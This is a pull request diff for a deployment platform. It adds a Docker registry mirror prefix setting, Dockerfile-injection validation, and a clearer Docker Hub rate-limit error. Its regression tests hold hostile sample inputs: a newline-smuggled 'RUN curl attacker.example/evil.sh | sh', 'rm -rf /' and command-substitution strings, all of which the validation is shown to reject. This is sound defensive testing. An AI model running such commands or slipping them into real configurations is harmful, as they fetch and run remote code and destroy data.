### PR TITLE
feat(deployments): diagnose Docker Hub rate limits, add registry mirror prefix

### DIFF
--- a/Cargo.lock
+++ b/Cargo.lock
@@ -12384,6 +12384,7 @@ dependencies = [
  "serde_json",
  "serde_yaml",
  "tempfile",
+ "temps-core",
  "temps-entities",
  "thiserror 2.0.20",
  "tokio",

--- a/Cargo.lock
+++ b/Cargo.lock
@@ -12386,6 +12386,7 @@ dependencies = [
  "tempfile",
  "temps-core",
  "temps-entities",
+ "testcontainers",
  "thiserror 2.0.20",
  "tokio",
  "toml 1.1.4+spec-1.1.0",

--- a/apps/temps-cli/openapi.json
+++ b/apps/temps-cli/openapi.json
@@ -3100,6 +3100,14 @@
               }
             ]
           },
+          "registry_mirror_prefix": {
+            "default": null,
+            "description": "Prefix applied to Docker Hub base images generated for a build (e.g.\nautopack's `FROM node:22-slim`), turning them into\n`{prefix}/node:22-slim`. Unlike `docker_registry` above — which\nauthenticates pulls to one *named* private registry a user's own image\nreference already points at — this rewrites Temps' own generated,\notherwise-anonymous `docker.io` references, for operators whose\ninternal registry is a path-prefixing reverse proxy rather than a\n`registry-mirrors`-compatible pull-through cache (which needs no\nrewriting at all — see docs/howto/configure-a-docker-registry-mirror).\n`None`/empty (the default) leaves every reference untouched.",
+            "type": [
+              "string",
+              "null"
+            ]
+          },
           "request_timeouts": {
             "default": {
               "default_http_timeout_seconds": 0,
@@ -3304,6 +3312,13 @@
           },
           "rate_limiting": {
             "$ref": "#/components/schemas/RateLimitSettings"
+          },
+          "registry_mirror_prefix": {
+            "description": "Prefix applied to implicit Docker Hub base images in generated\nDockerfiles (e.g. autopack's `FROM node:22-slim`). No sensitive\ncontent, passed through as-is. `None`/empty disables rewriting.",
+            "type": [
+              "string",
+              "null"
+            ]
           },
           "request_timeouts": {
             "$ref": "#/components/schemas/RequestTimeoutSettings",
@@ -8964,7 +8979,7 @@
         "type": "object"
       },
       "CreateProjectFromTemplateRequest": {
-        "description": "Request to create a project from a template\n\nSupports two deploy modes:\n  * **Fork mode** — when `git_provider_connection_id` is set, the template\n    repo is cloned into a new repository under the user's Git account and the\n    project tracks that fork (git-push deploys, automatic deploy on push).\n  * **One-click public-repo mode** — when `git_provider_connection_id` is\n    omitted, the project deploys directly from the template's public source\n    repository (no fork, no Git account required). This is the activation\n    path: a brand-new user with no Git provider connected can still deploy a\n    demo in one click. `repository_name` / `repository_owner` are ignored in\n    this mode, and automatic-deploy-on-push is unavailable (there is no fork\n    to receive webhooks).",
+        "description": "Request to create a project from a template\n\nSupports three deploy modes:\n  * **Native image service mode** — curated service templates deploy a\n    digest-pinned container image and retain their template release identity,\n    runtime configuration, and managed-service bindings.\n  * **Fork mode** — when `git_provider_connection_id` is set, the template\n    repo is cloned into a new repository under the user's Git account and the\n    project tracks that fork (git-push deploys, automatic deploy on push).\n  * **One-click public-repo mode** — when `git_provider_connection_id` is\n    omitted, the project deploys directly from the template's public source\n    repository (no fork, no Git account required). This is the activation\n    path: a brand-new user with no Git provider connected can still deploy a\n    demo in one click. `repository_name` / `repository_owner` are ignored in\n    this mode, and automatic-deploy-on-push is unavailable (there is no fork\n    to receive webhooks).",
         "properties": {
           "automatic_deploy": {
             "description": "Enable automatic deployment on push (defaults to true). Only honoured in\nfork mode; public-repo deploys cannot receive push webhooks.",
@@ -9094,14 +9109,14 @@
         "description": "Response after creating a project from template",
         "properties": {
           "deployment_error": {
-            "description": "Actionable retry guidance when project creation succeeded but deployment dispatch did not. Internal queue errors are never exposed.",
+            "description": "Actionable retry guidance when project creation succeeded but deployment\ndispatch did not. Internal queue errors are never exposed.",
             "type": [
               "string",
               "null"
             ]
           },
           "deployment_queued": {
-            "description": "Whether the initial deployment was successfully queued. This is set for native image service templates; Git-backed modes use their pipeline flow.",
+            "description": "Whether the initial deployment was successfully queued. This is set for\nnative image service templates; Git-backed modes use their pipeline flow.",
             "type": [
               "boolean",
               "null"
@@ -9177,7 +9192,7 @@
             ]
           },
           "expected_slug": {
-            "description": "Exact slug returned by service-template preflight. Normal project creation omits it.",
+            "description": "Optimistically reserved slug used by template creation to ensure the\npersisted project receives the URL shown during configuration.",
             "type": [
               "string",
               "null"
@@ -78605,7 +78620,7 @@
     },
     "/projects/from-template": {
       "post": {
-        "description": "Creates a new repository from a template and sets up the project with the\nspecified configuration. The template is cloned to a new repository under\nthe authenticated user's account or specified organization.",
+        "description": "Image-backed service templates are created directly from their pinned image.\nSource-backed starter templates can either use their public repository or\ncreate a repository under the selected Git provider account.",
         "operationId": "create_project_from_template",
         "requestBody": {
           "content": {
@@ -92621,7 +92636,7 @@
             "bearer_auth": []
           }
         ],
-        "summary": "Atomically replace a service-template project's image runtime and resource\nprofile. This endpoint is deliberately separate from generic project\nsettings because these fields form one deployable configuration.",
+        "summary": "Return the immutable service-template release applied to a project together\nwith catalog drift, missing requirements, and an available upgrade preview.",
         "tags": [
           "Projects"
         ],

--- a/apps/temps-cli/src/api/sdk.gen.ts
+++ b/apps/temps-cli/src/api/sdk.gen.ts
@@ -4915,9 +4915,9 @@ export const getVisibleCustomDomainByHostname = <ThrowOnError extends boolean = 
 /**
  * Create a new project from a template
  *
- * Creates a new repository from a template and sets up the project with the
- * specified configuration. The template is cloned to a new repository under
- * the authenticated user's account or specified organization.
+ * Image-backed service templates are created directly from their pinned image.
+ * Source-backed starter templates can either use their public repository or
+ * create a repository under the selected Git provider account.
  */
 export const createProjectFromTemplate = <ThrowOnError extends boolean = false>(options: Options<CreateProjectFromTemplateData, ThrowOnError>): RequestResult<CreateProjectFromTemplateResponses, CreateProjectFromTemplateErrors, ThrowOnError> => (options.client ?? client).post<CreateProjectFromTemplateResponses, CreateProjectFromTemplateErrors, ThrowOnError>({
     security: [{ scheme: 'bearer', type: 'http' }],
@@ -7103,9 +7103,8 @@ export const updateServiceTemplateRuntime = <ThrowOnError extends boolean = fals
 });
 
 /**
- * Atomically replace a service-template project's image runtime and resource
- * profile. This endpoint is deliberately separate from generic project
- * settings because these fields form one deployable configuration.
+ * Return the immutable service-template release applied to a project together
+ * with catalog drift, missing requirements, and an available upgrade preview.
  */
 export const getProjectServiceTemplate = <ThrowOnError extends boolean = false>(options: Options<GetProjectServiceTemplateData, ThrowOnError>): RequestResult<GetProjectServiceTemplateResponses, GetProjectServiceTemplateErrors, ThrowOnError> => (options.client ?? client).get<GetProjectServiceTemplateResponses, GetProjectServiceTemplateErrors, ThrowOnError>({
     security: [{ scheme: 'bearer', type: 'http' }],

--- a/apps/temps-cli/src/api/types.gen.ts
+++ b/apps/temps-cli/src/api/types.gen.ts
@@ -1512,6 +1512,19 @@ export type AppSettings = {
     preview_gateway?: PreviewGatewaySettings;
     rate_limiting?: RateLimitSettings;
     /**
+     * Prefix applied to Docker Hub base images generated for a build (e.g.
+     * autopack's `FROM node:22-slim`), turning them into
+     * `{prefix}/node:22-slim`. Unlike `docker_registry` above — which
+     * authenticates pulls to one *named* private registry a user's own image
+     * reference already points at — this rewrites Temps' own generated,
+     * otherwise-anonymous `docker.io` references, for operators whose
+     * internal registry is a path-prefixing reverse proxy rather than a
+     * `registry-mirrors`-compatible pull-through cache (which needs no
+     * rewriting at all — see docs/howto/configure-a-docker-registry-mirror).
+     * `None`/empty (the default) leaves every reference untouched.
+     */
+    registry_mirror_prefix?: string | null;
+    /**
      * Upstream request/connection timeouts applied by the proxy to customer
      * app traffic. Provides a global hard ceiling plus global defaults for
      * regular HTTP, SSE, and WebSocket traffic; projects and environments
@@ -1647,6 +1660,12 @@ export type AppSettingsResponse = {
      */
     proxy_port: number;
     rate_limiting: RateLimitSettings;
+    /**
+     * Prefix applied to implicit Docker Hub base images in generated
+     * Dockerfiles (e.g. autopack's `FROM node:22-slim`). No sensitive
+     * content, passed through as-is. `None`/empty disables rewriting.
+     */
+    registry_mirror_prefix?: string | null;
     /**
      * Upstream request/connection timeouts (hard ceiling + defaults) applied
      * by the proxy to customer app traffic. No sensitive content.
@@ -4386,7 +4405,10 @@ export type CreateProjectAccessRequest = {
 /**
  * Request to create a project from a template
  *
- * Supports two deploy modes:
+ * Supports three deploy modes:
+ * * **Native image service mode** — curated service templates deploy a
+ * digest-pinned container image and retain their template release identity,
+ * runtime configuration, and managed-service bindings.
  * * **Fork mode** — when `git_provider_connection_id` is set, the template
  * repo is cloned into a new repository under the user's Git account and the
  * project tracks that fork (git-push deploys, automatic deploy on push).
@@ -4479,11 +4501,13 @@ export type CreateProjectFromTemplateRequest = {
  */
 export type CreateProjectFromTemplateResponse = {
     /**
-     * Actionable retry guidance when project creation succeeded but deployment dispatch did not. Internal queue errors are never exposed.
+     * Actionable retry guidance when project creation succeeded but deployment
+     * dispatch did not. Internal queue errors are never exposed.
      */
     deployment_error?: string | null;
     /**
-     * Whether the initial deployment was successfully queued. This is set for native image service templates; Git-backed modes use their pipeline flow.
+     * Whether the initial deployment was successfully queued. This is set for
+     * native image service templates; Git-backed modes use their pipeline flow.
      */
     deployment_queued?: boolean | null;
     /**
@@ -4526,7 +4550,8 @@ export type CreateProjectRequest = {
      */
     environment_variables?: Array<ProjectEnvVarInput> | null;
     /**
-     * Exact slug returned by service-template preflight. Normal project creation omits it.
+     * Optimistically reserved slug used by template creation to ensure the
+     * persisted project receives the URL shown during configuration.
      */
     expected_slug?: string | null;
     /**

--- a/crates/temps-config/src/handler.rs
+++ b/crates/temps-config/src/handler.rs
@@ -1514,6 +1514,40 @@ fn sanitize_optional_url(
     Ok(Some(trimmed))
 }
 
+/// Trim and validate `registry_mirror_prefix`, rejecting anything outside a
+/// registry host+path's character set (alphanumerics, `.`, `-`, `_`, `:`,
+/// `/`).
+///
+/// This is the write-time half of the injection defense: `qualify_with_registry_prefix`
+/// (`temps-core::registry_prefix`) already refuses to splice a malformed
+/// prefix into a Dockerfile at build time, but rejecting here means an
+/// operator gets an immediate 400 explaining why, instead of the prefix
+/// silently never applying to any build. Reuses `temps_core`'s allowlist
+/// rather than re-deriving it, so the write-time check and the build-time
+/// check can never drift apart.
+fn sanitize_registry_mirror_prefix(prefix: Option<String>) -> Result<Option<String>, Problem> {
+    let Some(raw) = prefix else {
+        return Ok(None);
+    };
+
+    let trimmed = raw.trim().trim_end_matches('/').to_string();
+    if trimmed.is_empty() {
+        return Ok(None);
+    }
+
+    if !temps_core::registry_prefix::is_valid_registry_prefix(&trimmed) {
+        return Err(ErrorBuilder::new(StatusCode::BAD_REQUEST)
+            .title("Invalid Registry Mirror Prefix")
+            .detail(
+                "registry_mirror_prefix may only contain letters, digits, '.', '-', '_', ':' and '/'"
+                    .to_string(),
+            )
+            .build());
+    }
+
+    Ok(Some(trimmed))
+}
+
 fn validate_observability_compression(
     compression: &ObservabilityCompressionSettings,
 ) -> Result<(), Problem> {
@@ -1862,6 +1896,8 @@ async fn update_settings(
 
     settings.external_url = sanitize_optional_url("External", settings.external_url)?;
     settings.internal_url = sanitize_optional_url("Internal", settings.internal_url)?;
+    settings.registry_mirror_prefix =
+        sanitize_registry_mirror_prefix(settings.registry_mirror_prefix)?;
     // Validate and sanitize external_url
     if let Some(ref mut ext_url) = settings.external_url {
         *ext_url = ext_url.trim().to_string();
@@ -2453,6 +2489,65 @@ mod tests {
         assert!(
             sanitize_optional_url("External", Some("https://example.com#frag".to_string()))
                 .is_err()
+        );
+    }
+
+    #[test]
+    fn sanitize_registry_mirror_prefix_treats_blank_as_unset() {
+        assert_eq!(
+            sanitize_registry_mirror_prefix(Some(String::new())).unwrap(),
+            None
+        );
+        assert_eq!(
+            sanitize_registry_mirror_prefix(Some("   ".to_string())).unwrap(),
+            None
+        );
+        assert_eq!(sanitize_registry_mirror_prefix(None).unwrap(), None);
+    }
+
+    #[test]
+    fn sanitize_registry_mirror_prefix_trims_whitespace_and_trailing_slash() {
+        assert_eq!(
+            sanitize_registry_mirror_prefix(Some("  registry.example.com/docker/ \n".to_string()))
+                .unwrap(),
+            Some("registry.example.com/docker".to_string())
+        );
+    }
+
+    // Regression: the settings API is the boundary where an operator-supplied
+    // prefix must be rejected outright, not silently defused later. Without
+    // this, a prefix containing an embedded newline would be accepted and
+    // stored, and only fail to apply (silently) once a build actually ran.
+    #[test]
+    fn sanitize_registry_mirror_prefix_rejects_embedded_control_characters() {
+        let err = sanitize_registry_mirror_prefix(Some(
+            "registry.example.com\nRUN curl attacker.example/evil.sh | sh".to_string(),
+        ))
+        .unwrap_err();
+        let detail = err.body.get("detail").and_then(|v| v.as_str()).unwrap();
+        assert!(detail.contains("registry_mirror_prefix"));
+    }
+
+    #[test]
+    fn sanitize_registry_mirror_prefix_rejects_shell_metacharacters() {
+        assert!(sanitize_registry_mirror_prefix(Some(
+            "registry.example.com; rm -rf /".to_string()
+        ))
+        .is_err());
+        assert!(
+            sanitize_registry_mirror_prefix(Some("registry.example.com`whoami`".to_string()))
+                .is_err()
+        );
+    }
+
+    #[test]
+    fn sanitize_registry_mirror_prefix_accepts_a_well_formed_prefix() {
+        assert_eq!(
+            sanitize_registry_mirror_prefix(Some(
+                "registry.example.com:5000/team_a/docker-mirror".to_string()
+            ))
+            .unwrap(),
+            Some("registry.example.com:5000/team_a/docker-mirror".to_string())
         );
     }
 

--- a/crates/temps-config/src/handler.rs
+++ b/crates/temps-config/src/handler.rs
@@ -156,6 +156,11 @@ pub struct AppSettingsResponse {
     // Docker registry settings with masked password
     pub docker_registry: DockerRegistrySettingsMasked,
 
+    /// Prefix applied to implicit Docker Hub base images in generated
+    /// Dockerfiles (e.g. autopack's `FROM node:22-slim`). No sensitive
+    /// content, passed through as-is. `None`/empty disables rewriting.
+    pub registry_mirror_prefix: Option<String>,
+
     // Monitoring settings
     pub disk_space_alert: DiskSpaceAlertSettings,
 
@@ -398,6 +403,7 @@ impl From<AppSettings> for AppSettingsResponse {
                 tls_verify: settings.docker_registry.tls_verify,
                 ca_certificate: settings.docker_registry.ca_certificate,
             },
+            registry_mirror_prefix: settings.registry_mirror_prefix,
             disk_space_alert: settings.disk_space_alert,
             container_logs: settings.container_logs,
             agent_sandbox: AgentSandboxSettingsMasked {

--- a/crates/temps-core/src/app_settings.rs
+++ b/crates/temps-core/src/app_settings.rs
@@ -63,6 +63,19 @@ pub struct AppSettings {
     // Docker registry settings
     pub docker_registry: DockerRegistrySettings,
 
+    /// Prefix applied to Docker Hub base images generated for a build (e.g.
+    /// autopack's `FROM node:22-slim`), turning them into
+    /// `{prefix}/node:22-slim`. Unlike `docker_registry` above — which
+    /// authenticates pulls to one *named* private registry a user's own image
+    /// reference already points at — this rewrites Temps' own generated,
+    /// otherwise-anonymous `docker.io` references, for operators whose
+    /// internal registry is a path-prefixing reverse proxy rather than a
+    /// `registry-mirrors`-compatible pull-through cache (which needs no
+    /// rewriting at all — see docs/howto/configure-a-docker-registry-mirror).
+    /// `None`/empty (the default) leaves every reference untouched.
+    #[serde(default)]
+    pub registry_mirror_prefix: Option<String>,
+
     // System monitoring settings
     pub disk_space_alert: DiskSpaceAlertSettings,
 
@@ -1257,6 +1270,7 @@ impl Default for AppSettings {
             security_headers: SecurityHeadersSettings::default(),
             rate_limiting: RateLimitSettings::default(),
             docker_registry: DockerRegistrySettings::default(),
+            registry_mirror_prefix: None,
             image_retention: ImageRetentionSettings::default(),
             disk_space_alert: DiskSpaceAlertSettings::default(),
             container_logs: ContainerLogSettings::default(),

--- a/crates/temps-core/src/lib.rs
+++ b/crates/temps-core/src/lib.rs
@@ -27,6 +27,7 @@ pub mod project_access;
 pub mod project_ip_gate;
 pub mod public_hostname;
 pub mod public_hostname_resolver;
+pub mod registry_prefix;
 pub mod retention;
 pub mod retry;
 pub mod runtime;

--- a/crates/temps-core/src/registry_prefix.rs
+++ b/crates/temps-core/src/registry_prefix.rs
@@ -53,7 +53,7 @@ pub fn is_docker_hub_image(image: &str) -> bool {
 /// since a proxy that accepts `<prefix>/gotempsh/temps` is expected to accept
 /// `<prefix>/node` the same way.
 pub fn qualify_with_registry_prefix(image: &str, prefix: Option<&str>) -> String {
-    match prefix {
+    match prefix.map(str::trim) {
         Some(prefix) if !prefix.is_empty() && is_docker_hub_image(image) => {
             format!("{}/{}", prefix.trim_end_matches('/'), image)
         }
@@ -126,6 +126,25 @@ mod tests {
         assert_eq!(
             qualify_with_registry_prefix("node:22-slim", Some("registry.example.com/docker/")),
             "registry.example.com/docker/node:22-slim"
+        );
+    }
+
+    #[test]
+    fn trims_leading_and_trailing_whitespace_on_the_configured_prefix() {
+        // An operator pasting the prefix into the settings UI can easily pick
+        // up a trailing newline or leading space; left untrimmed, that
+        // whitespace lands verbatim inside every generated `FROM` line and
+        // breaks the build with an invalid image reference.
+        assert_eq!(
+            qualify_with_registry_prefix("node:22-slim", Some("  registry.example.com/docker \n")),
+            "registry.example.com/docker/node:22-slim"
+        );
+
+        // Whitespace-only "prefix" must behave exactly like `None`, not like
+        // an empty-string prefix baked onto every image.
+        assert_eq!(
+            qualify_with_registry_prefix("node:22-slim", Some("   ")),
+            "node:22-slim"
         );
     }
 }

--- a/crates/temps-core/src/registry_prefix.rs
+++ b/crates/temps-core/src/registry_prefix.rs
@@ -1,0 +1,131 @@
+// SPDX-FileCopyrightText: 2024-2026 Temps Contributors
+// SPDX-License-Identifier: MIT OR Apache-2.0
+
+//! Detects implicit Docker Hub image references and rewrites them through an
+//! operator-configured registry mirror/prefix.
+//!
+//! Every base image Temps builds against (autopack's generated Dockerfiles,
+//! external service images) is normally an unqualified reference like
+//! `node:22-slim` or `debian:bookworm-slim` — Docker resolves those against
+//! `docker.io` with no credentials attached, and Docker Hub throttles
+//! anonymous pulls by source IP. Some operators run an internal registry that
+//! is a path-prefixing reverse proxy rather than a `registry-mirrors`
+//! (pull-through cache) protocol implementation, so the daemon-level
+//! `registry-mirrors` option (see `docs/howto/configure-a-docker-registry-mirror`)
+//! doesn't work for them — the only way to route through their proxy is to
+//! rewrite the reference itself before it reaches the daemon.
+//!
+//! This module is the single place that decides "is this reference implicit
+//! Docker Hub" and "what does it become under the configured prefix", so
+//! every call site (autopack Dockerfile generation, direct image pulls)
+//! agrees on the same rule.
+
+/// Returns `true` when `image` has no explicit registry host, i.e. Docker
+/// would resolve it against `docker.io`.
+///
+/// Mirrors the rule Docker's own reference parser uses: the first path
+/// segment (up to the first `/`) is a registry host only if it contains a
+/// `.` or `:`, or is exactly `localhost`. A bare `library/postgres` or
+/// `bitnami/postgresql` has no such segment and is still Docker Hub; `node`
+/// (no `/` at all) is the official-image shorthand and is always Docker Hub
+/// regardless of a tag's `:` (the tag separator is not a host separator when
+/// there is no `/` in the reference at all).
+pub fn is_docker_hub_image(image: &str) -> bool {
+    let Some((first_segment, _rest)) = image.split_once('/') else {
+        // No slash at all: either "node" or "node:22-slim" — both are the
+        // official-image shorthand on docker.io. Never mistake the tag's `:`
+        // for a host port here.
+        return true;
+    };
+
+    let looks_like_registry_host =
+        first_segment.contains('.') || first_segment.contains(':') || first_segment == "localhost";
+
+    !looks_like_registry_host
+}
+
+/// Rewrite `image` through `prefix` if it is an implicit Docker Hub
+/// reference and a prefix is configured; otherwise return it unchanged.
+///
+/// The rewrite is a plain concatenation (`{prefix}/{image}`), matching how
+/// operators' existing registry proxies already rewrite other tooling's
+/// image references — it does not expand the implicit `library/` namespace,
+/// since a proxy that accepts `<prefix>/gotempsh/temps` is expected to accept
+/// `<prefix>/node` the same way.
+pub fn qualify_with_registry_prefix(image: &str, prefix: Option<&str>) -> String {
+    match prefix {
+        Some(prefix) if !prefix.is_empty() && is_docker_hub_image(image) => {
+            format!("{}/{}", prefix.trim_end_matches('/'), image)
+        }
+        _ => image.to_string(),
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn recognises_implicit_docker_hub_references() {
+        assert!(is_docker_hub_image("node:22-slim"));
+        assert!(is_docker_hub_image("node"));
+        assert!(is_docker_hub_image("debian:bookworm-slim"));
+        assert!(is_docker_hub_image("bitnami/postgresql:16"));
+        assert!(is_docker_hub_image("library/node:22-slim"));
+    }
+
+    #[test]
+    fn recognises_already_qualified_references_as_not_docker_hub() {
+        assert!(!is_docker_hub_image("ghcr.io/gotempsh/temps:latest"));
+        assert!(!is_docker_hub_image("quay.io/coreos/etcd:v3.5.0"));
+        assert!(!is_docker_hub_image("localhost:5000/myimage:latest"));
+        assert!(!is_docker_hub_image(
+            "registry.example.com:5000/team/app:latest"
+        ));
+    }
+
+    #[test]
+    fn qualifies_only_docker_hub_references_when_a_prefix_is_configured() {
+        assert_eq!(
+            qualify_with_registry_prefix("node:22-slim", Some("registry.example.com/docker")),
+            "registry.example.com/docker/node:22-slim"
+        );
+        assert_eq!(
+            qualify_with_registry_prefix(
+                "gotempsh/temps:latest",
+                Some("registry.example.com/docker")
+            ),
+            "registry.example.com/docker/gotempsh/temps:latest"
+        );
+
+        // Already-qualified references pass through untouched even with a
+        // prefix configured — rewriting them would point at the wrong host.
+        assert_eq!(
+            qualify_with_registry_prefix(
+                "ghcr.io/gotempsh/temps:latest",
+                Some("registry.example.com/docker")
+            ),
+            "ghcr.io/gotempsh/temps:latest"
+        );
+    }
+
+    #[test]
+    fn leaves_images_unchanged_when_no_prefix_is_configured() {
+        assert_eq!(
+            qualify_with_registry_prefix("node:22-slim", None),
+            "node:22-slim"
+        );
+        assert_eq!(
+            qualify_with_registry_prefix("node:22-slim", Some("")),
+            "node:22-slim"
+        );
+    }
+
+    #[test]
+    fn trims_a_trailing_slash_on_the_configured_prefix() {
+        assert_eq!(
+            qualify_with_registry_prefix("node:22-slim", Some("registry.example.com/docker/")),
+            "registry.example.com/docker/node:22-slim"
+        );
+    }
+}

--- a/crates/temps-core/src/registry_prefix.rs
+++ b/crates/temps-core/src/registry_prefix.rs
@@ -44,6 +44,29 @@ pub fn is_docker_hub_image(image: &str) -> bool {
     !looks_like_registry_host
 }
 
+/// Returns `true` when `prefix` is safe to splice verbatim into a
+/// `FROM <prefix>/<image>` line.
+///
+/// A registry host+path is restricted to this allowlist in practice
+/// (alphanumerics, `.`, `-`, `_`, `:` for a port, `/` for path segments).
+/// Rejecting everything else — in particular any whitespace, since a bare
+/// `str::trim()` only strips *leading/trailing* whitespace and leaves an
+/// embedded `\n` untouched — is what actually closes the injection: an
+/// operator-controlled prefix containing a newline would otherwise land
+/// verbatim inside a generated Dockerfile and become a syntactically
+/// independent BuildKit instruction (e.g. a smuggled `RUN` line).
+///
+/// Public so the settings write path (`temps-config`) can reject a bad value
+/// at the API boundary with a clear 400, using the exact same rule this
+/// module enforces defense-in-depth at build time — one allowlist, not two
+/// that can drift apart.
+pub fn is_valid_registry_prefix(prefix: &str) -> bool {
+    !prefix.is_empty()
+        && prefix
+            .chars()
+            .all(|c| c.is_ascii_alphanumeric() || matches!(c, '.' | '-' | '_' | ':' | '/'))
+}
+
 /// Rewrite `image` through `prefix` if it is an implicit Docker Hub
 /// reference and a prefix is configured; otherwise return it unchanged.
 ///
@@ -52,10 +75,22 @@ pub fn is_docker_hub_image(image: &str) -> bool {
 /// image references — it does not expand the implicit `library/` namespace,
 /// since a proxy that accepts `<prefix>/gotempsh/temps` is expected to accept
 /// `<prefix>/node` the same way.
+///
+/// A malformed prefix (anything outside the registry host+path character
+/// set — most importantly, embedded whitespace/control characters) is
+/// treated exactly like an absent prefix rather than spliced in: this
+/// function has to stay fail-closed on its own, since it is the last line of
+/// defense before the value is written into a Dockerfile, independent of
+/// whatever validation ran (or didn't) when the value was saved.
 pub fn qualify_with_registry_prefix(image: &str, prefix: Option<&str>) -> String {
     match prefix.map(str::trim) {
         Some(prefix) if !prefix.is_empty() && is_docker_hub_image(image) => {
-            format!("{}/{}", prefix.trim_end_matches('/'), image)
+            let prefix = prefix.trim_end_matches('/');
+            if is_valid_registry_prefix(prefix) {
+                format!("{prefix}/{image}")
+            } else {
+                image.to_string()
+            }
         }
         _ => image.to_string(),
     }
@@ -145,6 +180,49 @@ mod tests {
         assert_eq!(
             qualify_with_registry_prefix("node:22-slim", Some("   ")),
             "node:22-slim"
+        );
+    }
+
+    #[test]
+    fn refuses_to_splice_a_prefix_containing_an_embedded_newline() {
+        // `str::trim()` only strips leading/trailing whitespace -- an
+        // embedded `\n` survives it and, if spliced into a generated
+        // Dockerfile, becomes a syntactically independent BuildKit
+        // instruction. This must never reach the output: fall back to the
+        // unmodified image exactly as if no prefix were configured.
+        let malicious = "registry.example.com\nRUN curl attacker.example/evil.sh | sh\nFROM registry.example.com";
+        assert_eq!(
+            qualify_with_registry_prefix("node:22-slim", Some(malicious)),
+            "node:22-slim"
+        );
+    }
+
+    #[test]
+    fn refuses_to_splice_a_prefix_containing_other_control_or_shell_metacharacters() {
+        for malicious in [
+            "registry.example.com\r\nFROM evil",
+            "registry.example.com\0",
+            "registry.example.com; rm -rf /",
+            "registry.example.com`whoami`",
+            "registry.example.com$(whoami)",
+            "registry.example.com\"",
+        ] {
+            assert_eq!(
+                qualify_with_registry_prefix("node:22-slim", Some(malicious)),
+                "node:22-slim",
+                "expected {malicious:?} to be rejected"
+            );
+        }
+    }
+
+    #[test]
+    fn accepts_a_well_formed_prefix_with_a_port_and_path() {
+        assert_eq!(
+            qualify_with_registry_prefix(
+                "node:22-slim",
+                Some("registry.example.com:5000/team_a/docker-mirror")
+            ),
+            "registry.example.com:5000/team_a/docker-mirror/node:22-slim"
         );
     }
 }

--- a/crates/temps-deployments/src/jobs/build_image.rs
+++ b/crates/temps-deployments/src/jobs/build_image.rs
@@ -297,6 +297,10 @@ pub struct BuildImageJob {
     log_service: Option<Arc<LogService>>,
     preset: Option<StoredPreset>,
     preset_config: Option<StoredPresetConfig>,
+    /// Operator-configured prefix (`AppSettings::registry_mirror_prefix`)
+    /// applied to implicit Docker Hub base images in the generated
+    /// Dockerfile. `None` (the default) leaves every `FROM` line untouched.
+    registry_mirror_prefix: Option<String>,
 }
 
 impl std::fmt::Debug for BuildImageJob {
@@ -328,6 +332,7 @@ impl BuildImageJob {
             log_service: None,
             preset: None,
             preset_config: None,
+            registry_mirror_prefix: None,
         }
     }
 
@@ -368,6 +373,11 @@ impl BuildImageJob {
 
     pub fn with_preset_config(mut self, preset_config: Option<StoredPresetConfig>) -> Self {
         self.preset_config = preset_config;
+        self
+    }
+
+    pub fn with_registry_mirror_prefix(mut self, registry_mirror_prefix: Option<String>) -> Self {
+        self.registry_mirror_prefix = registry_mirror_prefix;
         self
     }
 
@@ -656,7 +666,7 @@ impl BuildImageJob {
 
         // Generate Dockerfile content with build args and .temps.yaml overrides
         // Use build_context_dir as both root and local path so preset detection works correctly
-        let dockerfile_with_args = preset
+        let mut dockerfile_with_args = preset
             .dockerfile(temps_presets::DockerfileConfig {
                 root_local_path: build_context_dir,
                 local_path: build_context_dir,
@@ -668,6 +678,21 @@ impl BuildImageJob {
                 use_buildkit: true, // Enable BuildKit for faster builds and caching
             })
             .await;
+
+        // Route implicit Docker Hub base images (`FROM node:22-slim`) through
+        // the operator's configured registry mirror/prefix, if any. Only
+        // applies to preset-generated Dockerfiles -- an existing Dockerfile
+        // in the repo never reaches this function at all (see
+        // `ensure_dockerfile`'s early return above), so a user's own FROM
+        // lines are never rewritten out from under them.
+        if let Some(prefix) = self
+            .registry_mirror_prefix
+            .as_deref()
+            .filter(|p| !p.is_empty())
+        {
+            dockerfile_with_args.content =
+                temps_presets::apply_registry_prefix(&dockerfile_with_args.content, prefix);
+        }
 
         // Write the Dockerfile
         write_no_follow(
@@ -1148,6 +1173,10 @@ impl BuildImageJob {
         build_host_platform: &str,
         error: &temps_deployer::BuilderError,
     ) -> String {
+        if let Some(message) = Self::describe_registry_rate_limit(platform, error) {
+            return message;
+        }
+
         let Some(platform) = platform else {
             return format!("Failed to build image: {}", error);
         };
@@ -1177,6 +1206,52 @@ impl BuildImageJob {
         } else {
             format!("Failed to build image for {}: {}", platform, error)
         }
+    }
+
+    /// Recognise a Docker Hub anonymous-pull rate limit and explain the fix.
+    ///
+    /// Autopack's generated Dockerfiles always reference unqualified base
+    /// images (`FROM node:22-slim`, `FROM debian:bookworm-slim`), so the
+    /// daemon resolves every one of them against `docker.io` with no
+    /// credentials attached — Temps has no registry auth or mirror
+    /// configuration of its own. Docker Hub throttles anonymous pulls per
+    /// source IP, and that limit is shared across every build this host (or,
+    /// on multi-node clusters, every node behind the same WAN IP) runs. The
+    /// daemon reports this as a generic pull failure buried in build output;
+    /// without translation it reads like a broken Dockerfile or a transient
+    /// network blip and sends people looking in the wrong place.
+    ///
+    /// Returns `None` for any other failure so the caller falls through to
+    /// its existing handling.
+    fn describe_registry_rate_limit(
+        platform: Option<&str>,
+        error: &temps_deployer::BuilderError,
+    ) -> Option<String> {
+        let text = error.to_string().to_lowercase();
+        let looks_like_rate_limit = text.contains("toomanyrequests")
+            || text.contains("pull rate limit")
+            || text.contains("429 too many requests")
+            || (text.contains("failed to authorize") && text.contains("429"));
+
+        if !looks_like_rate_limit {
+            return None;
+        }
+
+        let scope = match platform {
+            Some(platform) => format!(" for {}", platform),
+            None => String::new(),
+        };
+
+        Some(format!(
+            "Failed to build image{scope}: Docker Hub rate-limited an anonymous image pull ({error}). \
+             This build host pulls base images from docker.io without authentication, and Docker \
+             Hub throttles anonymous pulls by source IP — the limit is shared across every build \
+             this host runs, and across every node behind the same WAN IP on a multi-node cluster. \
+             Configure a registry mirror on this host's Docker daemon (the `registry-mirrors` option \
+             in /etc/docker/daemon.json) and restart Docker — see \
+             https://temps.sh/docs/configure-a-docker-registry-mirror for the steps, including how \
+             to also raise the pull ceiling with an authenticated pull-through cache."
+        ))
     }
 }
 
@@ -1350,6 +1425,7 @@ pub struct BuildImageJobBuilder {
     log_service: Option<Arc<LogService>>,
     preset: Option<StoredPreset>,
     preset_config: Option<StoredPresetConfig>,
+    registry_mirror_prefix: Option<String>,
 }
 
